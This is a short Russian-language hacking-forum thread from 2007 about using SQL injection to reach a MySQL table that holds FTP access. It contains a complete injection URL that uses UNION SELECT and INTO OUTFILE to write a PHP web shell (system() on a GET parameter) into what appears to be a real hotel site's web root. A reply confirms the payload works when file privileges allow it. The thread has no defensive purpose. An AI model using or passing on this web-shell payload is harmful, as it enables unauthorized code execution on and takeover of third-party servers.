10.12.2007, 08:29
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Ну можно берёшь аккаунт рута или другого пользователя, который имее доступ к этой таблице и вписываешь всё что душа захочет, только вряд ли можно это сделать с помощью Update, нужно сделать Grant
Вобщем чувак - без шансов
Пи*дец, думай хоть немного когда пишешь.
можно ли внести в нее изменения, чтобы я получил доступ к таблице с фтп доступом через Sql-injection?
Технически да, практически нет. Даже если для ремоут юзера разрешён update, то в субд mysql ничего не получится сделать, т.к. отсутствует поддержка подзапросов.
А вот, я правильно создаю шелл:
http://www.site.com/script.php?id=-597+UNION+SELECT+'<?php system($_GET[cmd]); ?>'+FROM+chotelsi_tophotel.news_users+INTO+OUTFILE +'/users/hotels/public_html/shell.php'/*
Ну если есть file_priv и файл создаётся, то правильно.
|
|
|